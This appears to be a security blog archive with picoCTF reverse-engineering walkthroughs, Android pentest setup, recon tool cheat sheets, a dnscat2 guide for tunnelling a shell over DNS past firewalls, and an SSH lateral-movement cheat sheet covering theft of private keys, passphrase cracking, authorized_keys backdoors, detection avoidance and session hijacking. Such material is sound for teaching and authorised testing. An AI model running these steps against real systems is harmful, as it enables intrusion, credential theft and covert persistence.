HacksofDhruv

Q: Nmap Download

You can download Nmap from https://nmap.org/download or a common option would be to install via your Linux distribution's package manager or Brew on macOS.

FactCheck CTF - Walkthrough

Dhruv Ambaliya — Fri, 02 Aug 2024 11:00:59 +0000

Difficulty Rating:

Description
Enumeration
Open it in Disassembler
Extracting Flag

Description

This binary is putting together some important piece of information… Can you uncover that information? Examine this file. Do you understand its inner workings? In this challenge, you are presented with an executable file named “bin”. Since it was a 64-bit ELF executable. When running the program, nothing is printed on the shell, and the process just terminates.

Download: Binary

Enumeration

I ran the strings command and found an incomplete flag in the output. Adding hello world and closing the brackets didn’t work.

I used Ghidra, an open-source binary analysis tool, to examine the disassembled code and gain insights into the compiled binary’s structure and functionality.

Open it in Disassembler

I analyzed the file in Ghidra and found a main function with calls to std::allocator<char>. The code likely dynamically allocates memory for strings, but without further understanding, it’s difficult to determine its purpose.

I found the allocator using the incomplete flag from the strings command. Clicking on it revealed additional characters at different memory addresses.

I discovered the incomplete flag and other data stored in memory, including the strings “Hello” and “World.” After attempting to concatenate these elements to the flag and submitting it, I realized that the flag was likely being dynamically loaded during runtime.

This led me to debug the code and identify a specific line ending with the character ‘}’ that appeared to be the point where the program completed writing the flag to memory. This insight was crucial in understanding the flag’s formation and ultimately solving the challenge.

Assembly view. 0x7d is the ascii value for the ‘}’ character

Extracting Flag

Assuming RDI holds the memory location, I checked its contents before the CALL to find the missing piece.Then calculating the breakpoint address using relative addressing (main + 0x5D2) to account for runtime address changes.

I used GDB to set a breakpoint at main + 0x5D2 and examined the instructions and RDI contents before and after the CALL.

WinAntiDbg0x100 CTF - Walkthrough

Dhruv Ambaliya — Mon, 29 Jul 2024 11:00:59 +0000

Difficulty Rating:

Description
Enumeration
Open it in Debugger
Extracting Flag

Description

This challenge will introduce you to ‘Anti-Debugging.’ Malware developers don’t like it when you attempt to debug their executable files because debugging these files reveals many of their secrets! That’s why, they include a lot of code logic specifically designed to interfere with your debugging process.

Download: Binary

Enumeration

From the challenge name and description we know that we will use a debugger on this challenge, But lets first run it and see what’ll happen.

ok, now lets open it using x32dbg

Open it in Debugger

After we reach the EntryPoint lets search for strings in all user modules

Lets jump to the string that looks like the “picoCTF” drawing and set a break point there

Extracting Flag

We see that after some instruction there is a call for isDebuggerPresent function, lets step until it and see how can we bypass this check

We see that the function returned 1 and the jump won’t be taken because the ZeroFlag wasn’t set to 1, so we can easily bypass this by setting the ZeroFlag to 1 so we can take the jump.

after some steps we see that the flag got decrypted and it’s visible to us.

packer CTF - Walkthrough

Dhruv Ambaliya — Thu, 25 Jul 2024 11:00:59 +0000

Difficulty Rating:

Description
Enumeration
Unpack the file

Description

In this challenge, you would be asked to reverse a linux executable. They provided a file named “out”. It definitely seemed like an ELF executable, which is the main executable format for Linux binaries (Windows uses another format, named PE).

Download: Binary

Enumeration

We see one ELF File and It’s packed using UPX

Unpack the file

Opening it in IDA and looking at main, it’s a Straightforward challenge we see the flag is hard coded in Hex.

vault-door-1 CTF - Walkthrough

Dhruv Ambaliya — Tue, 23 Jul 2024 11:00:59 +0000

Difficulty Rating:

Description
Enumeration
Extracting Flag

Description

This vault uses some complicated arrays! I hope you can make sense of it, special agent. The source code for this vault is here:

Download: VaultDoor1.java

Enumeration

We encountered another Java file that claimed to hide the flag in a more complex manner.

Upon inspecting the Java file using JD-GUI, a popular decompiler, we discovered a clever obfuscation technique. Each element within an array held a single character, and when these characters were sequentially concatenated, the hidden flag was revealed right before our eyes.

Extracting Flag

Below a python script that solve the challenge.

myPass = [None] * 32

myPass[0]  = 'd'
myPass[29] = 'f'
myPass[4]  = 'r'
myPass[2]  = '5'
myPass[23] = 'r'
myPass[3]  = 'c'
myPass[17] = '4'
myPass[1]  = '3'
myPass[7]  = 'b'
myPass[10] = '_'
myPass[5]  = '4'
myPass[9]  = '3'
myPass[11] = 't'
myPass[15] = 'c'
myPass[8]  = 'l'
myPass[12] = 'H'
myPass[20] = 'c'
myPass[14] = '_'
myPass[6]  = 'm'
myPass[24] = '5'
myPass[18] = 'r'
myPass[13] = '3'
myPass[19] = '4'
myPass[21] = 'T'
myPass[16] = 'H'
myPass[27] = '3'
myPass[30] = '3'
myPass[25] = '_'
myPass[22] = '3'
myPass[28] = 'e'
myPass[26] = '6'
myPass[31] = 'a'

print("" + ''.join(myPass))

vault-door-training CTF - Walkthrough

Dhruv Ambaliya — Mon, 22 Jul 2024 11:00:59 +0000

Difficulty Rating:

Description
Enumeration
Extracting Flag

Description

Your mission is to enter Dr. Evil’s laboratory and retrieve the blueprints for his Doomsday Project. The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer and requires a password to open. Unfortunately, our undercover agents have not been able to obtain the secret passwords for the vault doors, but one of our junior agents obtained the source code for each vault’s computer! You will need to read the source code for each level to figure out what the password is for that vault door. As a warmup, we have created a replica vault in our training facility.

Download: VaultDoorTraining.java

Enumeration

Extracting Flag

Upon examining the provided Java file using the JD-GUI decompiler, we were able to uncover the concealed flag. The flag, likely intended to be hidden or protected, was directly embedded within the source code itself.

Android Pen Testing Environment Setup

Dhruv Ambaliya — Sat, 20 Jul 2024 15:29:10 +0000

Install GenyMotion
Setup Burp Proxy with GenyMotion

This document covers the least exciting aspect of Android mobile app security testing, configuring the testing environment. It is both time consuming and an extremely important part of the assessment process to get right. This guide covers setup of GenyMotion with Burp Suite on Mac OS, but it should be trivial to replicate on Linux or Windows.

Install GenyMotion

GenyMotion is the android emulator of choice for dynamic android app security testing.

Installation on mac requires Virtual Box to be installed first, then run through the GenyMotion installer.

Install Android device (Nexus 4 works well)
Select Android 8.1 and deploy

Setup Burp Proxy with GenyMotion

If you are using DHCP you may want to statically assign an address, as the IP randomly changing requires this process to be completed again (which can get extremely annoying…).

1. GenyMotion Burp Proxy Settings

Select GenyMotion
Preferences
Network
Proxy Settings and tick HTTP and add your local interface address and a different port to one that Burp is using

2. Android 8.1 Proxy Settings

Swipe down the top and select Settings
Tap Network & Internet > Wi-Fi > Long Tap on the connected Wi-Fi network and Select Modify Network
Tap Advanced > Proxy > Manual and enter the same Proxy settings you entered in step 1

3. Android Burp Certificate Installation

Go to your web browser and download the certifcate file from http://burp
Rename it to .cer
Drag it into the running GenyMotion phone (this will place the file at /sd-card/)
On the phone go to Settings > Security & Location > Encryption & Location > Install from SD card (Install certificates from SD card)
Click Downloads on the left and select the .cer file
Install the certificate and call it Burp

You will need to set a pin code, set one

4. Burp Proxy Settings

Add a Burp proxy on the interface with the IP and port used at step 1

5. ADB

Install brew
brew install android-platform-tools
adb devices

List of devices attached
192.168.XX.XXX:5555	device

adb shell

vbox86p:/ # ls

Your id should be root on GenyMotion.

6. Installing APK FIles

There are two options for installing APK files, using adb or dragging and dropping.

Using ADB:

adb install file.apk

Or drag and drop the apk file into the running GenyMotion Android device.

7. ADB Basic Commands

Installed Android application location:

cd /data/data

For a more in depth guide on how to use ADB see our ADB commands cheat sheet here.

8. Open GApps

If you are assessing an application from the Play Store then you can install open gapps in GenyMotion by clickin on the icon on the right hand menu.

Enjoy.

DNS Tunneling dnscat2 Cheat Sheet

Dhruv Ambaliya — Mon, 24 Jun 2024 10:29:10 +0000

What is DNS Tunneling
You Will Need
Buying a Domain
- How to Change Name Servers On NameSilo
DNS Forwarding with Dnscat2
Dnscat2 Port Forwarding

What is DNS Tunneling

DNS tunneling is used to evade egress firewall rules and/or IDS / proxy or other web filtering applicances by tunneling data over DNS. DNS tunneling usually works as external DNS resolution is available on most networks, it should be noted that DNS tunneling is slow due to the low amounts of data that can be transfered.

What You Will Learn:

What is DNS tunneling
How to setup dnscat2
How to tunnel data over dnscat2

You Will Need

A real world domain, NameSilo works well and has free WHOIS privacy.
A VPS to run DNSCAT2 - Linode is cheap and works for this and this link will give you a $100 voucher (see instructions below)

In order to tunnel data over DNS a real world domain must be used and the domains authoritivate name servers must be set to servers in your control.

Buying a Domain

NameSilo offers free domain WHOIS privacy, a lot of extensions and is well priced.

How to Change Name Servers On NameSilo

Go to the Domain Manager page within your account
Click the applicable domain name (it will be underlined in black)
Click the “View/Manage Registered NameServers” link within the “NameServers” box

DNS Forwarding with Dnscat2

Install dsncat2 apt-get install dnscat2 -y
Run: dnscat2-server yourdomain.com on your VPS
From the client machine you will need to run the dnscat2 payload
If your domain’s NS are configured correctly the session should be established
Enter session -i to spawn an interactive session
Launch a shell using shell

Dnscat2 Port Forwarding

Dnscat2 supports TCP forwarding allowing you to tunnel SSH or RDP connections over the established DNS tunnel.

 
command (client) 4> listen 127.0.0.1:22 target:22

Again this will slow but functional.

Enjoy.

Katana Cheat Sheet - Commands, Flags & Examples

Dhruv Ambaliya — Thu, 06 Jun 2024 14:37:10 +0000

What is Katana

Katana is a fast web crawler made by Project Discovery. The tool is both headless and non-headless with a focus on being used in automation workflows. For example Katana could be used to crawl a target and stored all crawled data, or Katana could be used to crawl a site and store all urls with inputs. The following Katana cheat sheet aims to provide an overview of the tools functionality and provide real world examples from existing workflows.

Install Katana

go install github.com/projectdiscovery/katana/cmd/katana@latest

What is Katana
Install Katana
Basic Usage
Katana Cheat Sheet
Katana Example Commands
- Katana Output Query Paramaters
Conclusion

Basic Usage

katana -u target-domain.com

Katana Cheat Sheet

Katana Input Commands

COMMAND	DESCRIPTION
`-u, -list string[]`	target url / list to crawl
`-resume string`	resume scan using resume.cfg
`-e, -exclude string[]`	exclude host matching specified filter ('cdn', 'private-ips', cidr, ip, regex)

Katana Configuration Options

COMMAND	DESCRIPTION
`-u, -list string[]`	target url / list to crawl
`-resume string`	resume scan using resume.cfg
`-e, -exclude string[]`	exclude host matching specified filter ('cdn', 'private-ips', cidr, ip, regex)
`-r, -resolvers string[]`	list of custom resolver (file or comma separated)
`-d, -depth int`	maximum depth to crawl (default 3)
`-jc, -js-crawl`	enable endpoint parsing / crawling in javascript file
`-jsl, -jsluice`	enable jsluice parsing in javascript file (memory intensive)
`-ct, -crawl-duration value`	maximum duration to crawl the target for (s, m, h, d) (default s)
`-kf, -known-files string`	enable crawling of known files (all,robotstxt,sitemapxml), a minimum depth of 3 is required to ensure all known files are properly crawled.
`-mrs, -max-response-size int`	maximum response size to read (default 9223372036854775807)
`-timeout int`	time to wait for request in seconds (default 10)
`-aff, -automatic-form-fill`	enable automatic form filling (experimental)
`-fx, -form-extraction`	extract form, input, textarea & select elements in jsonl output
`-retry int`	number of times to retry the request (default 1)
`-proxy string`	http/socks5 proxy to use
`-H, -headers string[]`	custom header/cookie to include in all http request in header:value format (file)
`-config string`	path to the katana configuration file
`-fc, -form-config string`	path to custom form configuration file
`-flc, -field-config string`	path to custom field configuration file
`-s, -strategy string`	Visit strategy (depth-first, breadth-first) (default "depth-first")
`-iqp, -ignore-query-params`	Ignore crawling same path with different query-param values
`-tlsi, -tls-impersonate`	enable experimental client hello (ja3) tls randomization
`-dr, -disable-redirects`	disable following redirects (default false)

Katana Debug Options

COMMAND	DESCRIPTION
`-health-check, -hc`	run diagnostic check up
`-elog, -error-log string`	file to write sent requests error log

Katana Headless Mode Options

Allow Katana to scan using a real browser, to pretent targets / wafs fingerprint blocking - your traffic will appear to be from a legitimate web browsers fingerprint.

COMMAND	DESCRIPTION
`-hl, -headless`	enable headless hybrid crawling (experimental)
`-sc, -system-chrome`	use local installed chrome browser instead of katana installed
`-sb, -show-browser`	show the browser on the screen with headless mode
`-ho, -headless-options string[]`	start headless chrome with additional options
`-nos, -no-sandbox`	start headless chrome in --no-sandbox mode
`-cdd, -chrome-data-dir string`	path to store chrome browser data
`-scp, -system-chrome-path string`	use specified chrome browser for headless crawling
`-noi, -no-incognito`	start headless chrome without incognito mode
`-cwu, -chrome-ws-url string`	use chrome browser instance launched elsewhere with the debugger listening at this URL
`-xhr, -xhr-extraction`	extract xhr request url,method in jsonl output

Katana Passive Crawling

Using third party locations such as the wayback machine, crawl a target passively (without ever touching the target).

COMMAND	DESCRIPTION
`-ps, -passive`	enable passive sources to discover target endpoints
`-pss, -passive-source string[]`	passive source to use for url discovery (waybackarchive,commoncrawl,alienvault)

Katana Scope Options

Scope Katana to define what is in scope / out of scope including filters and exlcudes for file types. E.g., don’t store crawled videos or jpg, fonts etc.

COMMAND	DESCRIPTION
`-cs, -crawl-scope string[]`	in scope url regex to be followed by crawler
`-cos, -crawl-out-scope string[]`	out of scope url regex to be excluded by crawler
`-fs, -field-scope string`	pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io\|company.com)') (default "rdn")
`-ns, -no-scope`	disables host based default scope
`-do, -display-out-scope`	display external endpoint from scoped crawling

Katana Filters

Configure Katana to match or filter or exclude results based on the following configuration options.

COMMAND	DESCRIPTION
`-cs, -crawl-scope string[]`	in scope url regex to be followed by crawler
`-cos, -crawl-out-scope string[]`	out of scope url regex to be excluded by crawler
`-fs, -field-scope string`	pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io\|company.com)') (default "rdn")
`-ns, -no-scope`	disables host based default scope
`-do, -display-out-scope`	display external endpoint from scoped crawling

Katana Rate Limiting

Configure the number of threads, or requests per second or per minute for Katana.

COMMAND	DESCRIPTION
`-c, -concurrency int`	number of concurrent fetchers to use (default 10)
`-p, -parallelism int`	number of concurrent inputs to process (default 10)
`-rd, -delay int`	request delay between each request in seconds
`-rl, -rate-limit int`	maximum requests to send per second (default 150)
`-rlm, -rate-limit-minute int`	maximum number of requests to send per minute

How To Update Katana

COMMAND	DESCRIPTION
`-up, -update`	update katana to latest version
`-duc, -disable-update-check`	disable automatic katana update check

Katana Output File Options

Output Katana crawl data to file types.

COMMAND	DESCRIPTION
`-o, -output string`	file to write output to
`-sr, -store-response`	store http requests/responses
`-srd, -store-response-dir string`	store http requests/responses to custom directory
`-or, -omit-raw`	omit raw requests/responses from jsonl output
`-ob, -omit-body`	omit response body from jsonl output
`-j, -jsonl`	write output in jsonl format
`-nc, -no-color`	disable output content coloring (ANSI escape codes)
`-silent`	display output only
`-v, -verbose`	display verbose output
`-debug`	display debug output
`-version`	display project version

Katana Example Commands

Katana Output Query Paramaters

Build a list of URL input injection fields from a target:

katana -f qurl -o qurl-output.txt

Do the same but from a httpx scan output text file:

cut -d " " -f 1 httpx.txt | katana -f qurl -o qurl-httpx.txt

Conclusion

We hope you found this Katana cheat sheet useful, and it helps you get started with this powerful web crawler by Project Discovery.

httpx Cheat Sheet - Commands & Examples Tutorial

Dhruv Ambaliya — Tue, 04 Jun 2024 05:37:10 +0000

What is httpx?

httpx is a fast and multi-purpose HTTP toolkit made by Project Discovery that allows running multiple probes using the retryablehttp library. It is designed to maintain result reliability with an increased number of threads. httpx can be used to obtain web server information, such as headers, download pages and take screenshots of targets. httpx is perfect for validating http/https servers for large scopes on bugbounty programs or performing asset management / penetration testing.

What is httpx?
httpx Installation
httpx Project Discovery Tutorial
httpx Supported Probes
httpx Cheat Sheet
Real World httpx Examples
Conclusion

httpx Installation

How to install httpx:

go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

httpx Project Discovery Tutorial

After installation the following simple httpx tutorial will get you up and scanning web servers:

cat targets.txt | httpx

For more options and real world httpx examples see the bottom of this document.

httpx Supported Probes

The type of data httpx can obtain from target web servers:

Probes	Default check	Probes	Default check
URL	true	IP	true
Title	true	CNAME	true
Status Code	true	Raw HTTP	false
Content Length	true	HTTP2	false
TLS Certificate	true	HTTP Pipeline	false
CSP Header	true	Virtual host	false
Line Count	true	Word Count	true
Location Header	true	CDN	false
Web Server	true	Paths	false
Web Socket	true	Ports	false
Response Time	true	Request Method	true
Favicon Hash	false	Probe Status	false
Body Hash	true	Header Hash	true
Redirect chain	false	URL Scheme	true
JARM Hash	false	ASN	false

TIP: Take Screenshots with httpx

To take screenshots with httpx use -screenshot or -ss

httpx Cheat Sheet

httpx Input Commands

COMMAND	DESCRIPTION
`-l, -list string`	input file containing list of hosts to process
`-rr, -request string`	file containing raw request
`-u, -target string[]`	input target host(s) to probe

httpx Probe Commands

COMMAND	DESCRIPTION
`-sc, -status-code`	display response status-code
`-cl, -content-length`	display response content-length
`-ct, -content-type`	display response content-type
`-location`	display response redirect location
`-favicon`	display mmh3 hash for '/favicon.ico' file
`-hash string`	display response body hash (supported: md5,mmh3,simhash,sha1,sha256,sha512)
`-jarm`	display jarm fingerprint hash
`-rt, -response-time`	display response time
`-lc, -line-count`	display response body line count
`-wc, -word-count`	display response body word count
`-title`	display page title
`-bp, -body-preview`	display first N characters of response body (default 100)
`-server, -web-server`	display server name
`-td, -tech-detect`	display technology in use based on wappalyzer dataset
`-method`	display http request method
`-websocket`	display server using websocket
`-ip`	display host ip
`-cname`	display host cname
`-asn`	display host asn information
`-cdn`	display cdn/waf in use (default true)
`-probe`	display probe status

httpx Headless Options

COMMAND	DESCRIPTION
`-ss, -screenshot`	enable saving screenshot of the page using headless browser
`-system-chrome`	enable using local installed chrome for screenshot
`-esb, -exclude-screenshot-bytes`	enable excluding screenshot bytes from json output
`-ehb, -exclude-headless-body`	enable excluding headless header from json output

httpx Match in Response

Allows httpx to match something in the server response header / body / http response code or url etc.

COMMAND	DESCRIPTION
`-mc, -match-code string`	match response with specified status code (-mc 200,302)
`-ml, -match-length string`	match response with specified content length (-ml 100,102)
`-mlc, -match-line-count string`	match response body with specified line count (-mlc 423,532)
`-mwc, -match-word-count string`	match response body with specified word count (-mwc 43,55)
`-mfc, -match-favicon string[]`	match response with specified favicon hash (-mfc 1494302000)
`-ms, -match-string string`	match response with specified string (-ms admin)
`-mr, -match-regex string`	match response with specified regex (-mr admin)
`-mcdn, -match-cdn string[]`	match host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
`-mrt, -match-response-time string`	match response with specified response time in seconds (-mrt '< 1')
`-mdc, -match-condition string`	match response with dsl expression condition

httpx Extract Regex Strings

Allows httpx to extract regex strings from the reponse.

COMMAND	DESCRIPTION
`-er, -extract-regex string[]`	display response content with matched regex
`-ep, -extract-preset string[]`	display response content matched by a pre-defined regex (mail, url, ipv4)

httpx Filters

Filter by response code, length, server version, error page, url etc

COMMAND	DESCRIPTION
`-fc, -filter-code string`	filter response with specified status code (-fc 403,401)
`-fep, -filter-error-page`	filter response with ML based error page detection
`-fl, -filter-length string`	filter response with specified content length (-fl 23,33)
`-flc, -filter-line-count string`	filter response body with specified line count (-flc 423,532)
`-fwc, -filter-word-count string`	filter response body with specified word count (-fwc 423,532)
`-ffc, -filter-favicon string[]`	filter response with specified favicon hash (-ffc 1494302000)
`-fs, -filter-string string`	filter response with specified string (-fs admin)
`-fe, -filter-regex string`	filter response with specified regex (-fe admin)
`-fcdn, -filter-cdn string[]`	filter host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
`-frt, -filter-response-time string`	filter response with specified response time in seconds (-frt '> 1')
`-fdc, -filter-condition string`	filter response with dsl expression condition
`-strip`	strips all tags in response. supported formats: html,xml (default html)

httpx Rate Limiting

Limit the number of requests httpx can make per second / per minute and configure the number of threads.

COMMAND	DESCRIPTION
`-t, -threads int`	number of threads to use (default 50)
`-rl, -rate-limit int`	maximum requests to send per second (default 150)
`-rlm, -rate-limit-minute int`	maximum number of requests to send per minute

Misc httpx Commands

COMMAND	DESCRIPTION
`-pa, -probe-all-ips`	probe all the ips associated with same host
`-p, -ports string[]`	ports to probe (nmap syntax: eg http:1,2-10,11,https:80)
`-path string`	path or list of paths to probe (comma-separated, file)
`-tls-probe`	send http probes on the extracted TLS domains (dns_name)
`-csp-probe`	send http probes on the extracted CSP domains
`-tls-grab`	perform TLS(SSL) data grabbing
`-pipeline`	probe and display server supporting HTTP1.1 pipeline
`-http2`	probe and display server supporting HTTP2
`-vhost`	probe and display server supporting VHOST
`-ldv, -list-dsl-variables`	list json output field keys name that support dsl matcher/filter

httpx Update

How to update httpx + how to disable auto update.

COMMAND	DESCRIPTION
`-up, -update`</code>	update httpx to latest version
`-duc, -disable-update-check`	disable automatic httpx update check

httpx File Output

httpx output file options.

COMMAND	DESCRIPTION
`-o, -output string`	file to write output results
`-oa, -output-all`	filename to write output results in all formats
`-sr, -store-response`	store http response to output directory
`-srd, -store-response-dir string`	store http response to custom directory
`-csv`	store output in csv format
`-csvo, -csv-output-encoding string`	define output encoding
`-j, -json`	store output in JSONL(ines) format
`-irh, -include-response-header`	include http response (headers) in JSON output (-json only)
`-irr, -include-response`	include http request/response (headers + body) in JSON output (-json only)
`-irrb, -include-response-base64`	include base64 encoded http request/response in JSON output (-json only)
`-include-chain`	include redirect http chain in JSON output (-json only)
`-store-chain`	include http redirect chain in responses (-sr only)
`-svrc, -store-vision-recon-cluster`	include visual recon clusters (-ss and -sr only)

httpx Config Options

COMMAND	DESCRIPTION
`-config string`	path to the httpx configuration file (default $HOME/.config/httpx/config.yaml)
`-r, -resolvers string[]`	list of custom resolver (file or comma separated)
`-allow string[]`	allowed list of IP/CIDR's to process (file or comma separated)
`-deny string[]`	denied list of IP/CIDR's to process (file or comma separated)
`-sni, -sni-name string`	custom TLS SNI name
`-random-agent`	enable Random User-Agent to use (default true)
`-H, -header string[]`	custom http headers to send with request
`-http-proxy, -proxy string`	http proxy to use (eg http://127.0.0.1:8080)
`-unsafe`	send raw requests skipping golang normalization
`-resume`	resume scan using resume.cfg
`-fr, -follow-redirects`	follow http redirects
`-maxr, -max-redirects int`	max number of redirects to follow per host (default 10)
`-fhr, -follow-host-redirects`	follow redirects on the same host
`-rhsts, -respect-hsts`	respect HSTS response headers for redirect requests
`-vhost-input`	get a list of vhosts as input
`-x string`	request methods to probe, use 'all' to probe all HTTP methods
`-body string`	post body to include in http request
`-s, -stream`	stream mode - start elaborating input targets without sorting
`-sd, -skip-dedupe`	disable dedupe input items (only used with stream mode)
`-ldp, -leave-default-ports`	leave default http/https ports in host header (eg. http://host:80 - https://host:443)
`-ztls`	use ztls library with autofallback to standard one for tls13
`-no-decode`	avoid decoding body
`-tlsi, -tls-impersonate`	enable experimental client hello (ja3) tls randomization
`-no-stdin`	Disable Stdin processing

httpx Debug Options

COMMAND	DESCRIPTION
`-health-check, -hc`	run diagnostic check up
`-debug`	display request/response content in cli
`-debug-req`	display request content in cli
`-debug-resp`	display response content in cli
`-version`	display httpx version
`-stats`	display scan statistic
`-profile-mem string`	optional httpx memory profile dump file
`-silent`	silent mode
`-v, -verbose`	verbose mode
`-si, -stats-interval int`	number of seconds to wait between showing a statistics update (default: 5)
`-nc, -no-color`	disable colors in cli output

Optimizations

Improve the performance of httpx tune the settings to the target environment.

COMMAND	DESCRIPTION
`-nf, -no-fallback`	display both probed protocol (HTTPS and HTTP)
`-nfs, -no-fallback-scheme`	probe with protocol scheme specified in input
`-maxhr, -max-host-error int`	max error count per host before skipping remaining path/s (default 30)
`-ec, -exclude-cdn`	skip full port scans for CDN/WAF (only checks for 80,443)
`-eph, -exclude-private-hosts`	skip any hosts which have a private ip address
`-retries int`	number of retries
`-timeout int`	timeout in seconds (default 10)
`-delay value`	duration between each http request (eg: 200ms, 1s) (default -1ns)
`-rsts, -response-size-to-save int`	max response size to save in bytes (default 2147483647)
`-rstr, -response-size-to-read int`	max response size to read in bytes (default 2147483647)

Real World httpx Examples

DNSX to httpx

Run domains through dnsx to confirm resolution, then through httpx to confirm a 200 response from the webserver:

dnsx -d roots.txt -w <key,words> | httpx -sc -mc 200

httpx Follow Redirects

For httpx to follow redirects use:

httpx -follow-redirects

httpx Screenshot

Take a screenshot of targets that return 200 response:

httpx -sc -mc 200 -ss

Basic Recon

httpx -t 200 -random-agent -nc -silent -timeout 8 -sc -server -title -o httpx.out

Conclusion

We hope this httpx cheat sheet was useful in covering the usage of this excellent HTTP toolkit by Project Discovery for performing recon against web servers and applications.

SSH Lateral Movement Cheat Sheet

Dhruv Ambaliya — Mon, 03 Jun 2024 15:29:10 +0000

What is a Lateral Movement
SSH Lateral Movement
SSH Agent Forwarding Hijacking

What is a Lateral Movement

A lateral movement typically occurs after a host has been compromised via a reverse shell, and foothold in the network is obtained. Fully compromising the target machine by performing Linux privilege escalation or Windows privilege escalation could be advantageous due to the increased access to files or operating system functionality leveraged by a root level account.

This article focuses specifically on SSH lateral movement techniques on Linux.

SSH Lateral Movement

SSH private keys are typically an easy way to progress through the network, and are often found with poor permissions or duplicated in home directories. This article does not cover SSH pivoting in depth, we have a separate resource for SSH pivoting.

Enumerate Non UNIX Based Hosts for Private Keys

SSH is not specific to UNIX based operating systems, consider enumerating Windows target for SSH private keys.

Manually Look for SSH Keys

Check home directories and obvious locations for private key files:

/home/*
cat /root/.ssh/authorized\_keys 
cat /root/.ssh/identity.pub 
cat /root/.ssh/identity 
cat /root/.ssh/id\_rsa.pub 
cat /root/.ssh/id\_rsa 
cat /root/.ssh/id\_dsa.pub 
cat /root/.ssh/id\_dsa 
cat /etc/ssh/ssh\_config 
cat /etc/ssh/sshd\_config 
cat /etc/ssh/ssh\_host\_dsa\_key.pub 
cat /etc/ssh/ssh\_host\_dsa\_key 
cat /etc/ssh/ssh\_host\_rsa\_key.pub 
cat /etc/ssh/ssh\_host\_rsa\_key 
cat /etc/ssh/ssh\_host\_key.pub 
cat /etc/ssh/ssh\_host\_key
cat ~/.ssh/authorized\_keys 
cat ~/.ssh/identity.pub 
cat ~/.ssh/identity 
cat ~/.ssh/id\_rsa.pub 
cat ~/.ssh/id\_rsa 
cat ~/.ssh/id\_dsa.pub 
cat ~/.ssh/id\_dsa

Search For Files Containing SSH Keys

 
grep -ir "-----BEGIN RSA PRIVATE KEY-----" /home/*
grep -ir "BEGIN DSA PRIVATE KEY" /home/*

grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*

Identify The Host for the Key

Hashed known_hosts

Modern Linux systems may hash the known_hosts file entries to help prevent against enumeration.

If you find a key you then need to identify what server the key is for. In an attempt to idenitfy what host the key is for the following locations should be checked:

/etc/hosts 
~/.known_hosts
~/.bash_history 
~/.ssh/config

Cracking SSH Passphrase Keys

If the discovered SSH key is encrypted with a passphrase this can be cracked locally (much faster), below are several methods. If you have access to a GPU hashcat should be leveraged to improve the cracking time.

Cracking SSH Passphrase with John the Ripper

John the Ripper has a function to convert he key to a hash called john2hash.py and comes pre installed on Kali.

Convert the hash: python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash-john
Use a comprehensive wordlist: john –wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash-john
Wait and hope

Help Avoid Detection

Avoid directly connecting from a unknown host to the target SSH server, use an already known host to help prevent detection alerts being issued.

SSH Passphrase Backdoor

While you have access to the compromised host, it is typically a good idea to backdoor the SSH authorized_keys file which will allow for passwordless login at a point in the future. This should provide an easier and more reliable connection than exploiting and accessing via a reverse shell; and potentially reduce the risk of detection.

Adding the key is simply a case of paste a SSH public key, generated on your attacking machine and pasting it into the ~/ssh/authorized_keys file on the compromised machine.

run ssh-keygen -t rsa -b 4096
cat id_rsa.pub and copy the file contents
echo “SSH key data” » ~/.ssh/authorized_keys
Test you can connect using the private key without being prompted for a password

SSH Agent Forwarding Hijacking

Starting point: You have SSH already backdoored the compromised host by adding your public key to the ~/.authorized_keys file.

How SSH Agent Works

SSH agent works by allowing the Intermediary machine to pass-through (forward) your SSH key from your client to the next downstream server, allowing the machine in the middle (potentially a bastion host) to use your key without having physical access to your key as they are not stored on the intermediate host but simply forwarded on to the downstream target server.

Access the machine where the existing victim user session is established
Root level access to the machine where the victim session is established
A current victim SSH connection with agent forwarding enabled

Your Machine => Intermediary Host (forwards your key) => Downstream Machine

The Risk

The primary risk of using SSH Agent Forwarding is if the intermediatory machine is compromised, and the attacker has significant permissions they could, potentially use the established session socket to gain access to downstream servers.

How To Hijack SSH Agent Forwarding

Attacking Machine => Compromised Intermediary Host (with SSH Key) => Downsteam Machine (final destination)

SSH agent forwarding allows a user to connect to other machines without entering passwords. This functionality can be exploited to access any host the compromised users SSH key has access to (without having direct access to the keys), while there is an active session.

A potentially easier way to think of SSH agent forwarding, is to think of it as assigning the SSH key to the active SSH session, while the session is in place it is possible to access the SSH key and connect to other machines that the SSH key has access.

In order to exploit SSH agent forwarding an active session must be open between the user client (that you wish to hijack) and the compromised intermediary host. You will also require access to the host where the user is connected with superuser privileges (such as su - username, or sudo) to access the account running the active SSH session you wish to hijack.

If -A SSH Connection Fails

If -A fails to connect, perform the following: ```echo "ForwardingAgent yes" >> ~/.ssh/config``` to enable agent forwarding.

Client Instructions

Run the following on your local client machine:

You may need to create a new key, if so run ssh-add.

Open an SSH connection using agent forwarding to the compromised host ssh -A user@compromsied-host
Verify agent forwarding is working by using: ssh-add -l
Obtain root: sudo -s
Gain access to the account you wish to access: su - victim
Access any SSH connection the private key of the victim has access

SSH Hijacking with ControlMaster

OpenSSH has a function called ControlMaster that enables the sharing of multiple sessions over a single network connection. Allowing you to connect to the server once and have all other subsequent SSH sessions use the initial connection.

In order to exploit SSH ControlMaster you first need shell level access to the target; you will then need sufficient privileges to modify the config of a user to enable the ControlMaster functionality.

Gain shell level access to the target machine
Access the victim users home directory and create / modify the file ~/.ssh/config
Add the following configuration:

Host *

ControlMaster auto
~/.ssh/master-socket/%r@%h:%p
ControlPersist yes

ensure the master-socket directory exists if it does not, create it mkdir ~/.ssh/master-socket/
Ensure the correct permissions are in place for the config file chmod 600 ~/.ssh/config
Wait for the victim to login and establish a connection to another server
View the directory created at step 4 to observe the socket file: ls -lat ~/.ssh/master-socket
To hijack the existing connection ssh to user@hostname / IP listed in step 7

If you know of more techniques let me know on LinkedIn

Enjoy.

Pen Testing Tools Cheat Sheet

Dhruv Ambaliya — Sat, 01 Jun 2024 14:22:10 +0000

Introduction

Penetration testing tools cheat sheet, a quick reference for common penetration testing commands and techniques. This cheat sheet is designed to provide a quick overview of typical commands used during a penetration testing engagement. For in-depth usage, consult the tool’s manual or explore more specialized cheat sheets from the menu on the right.

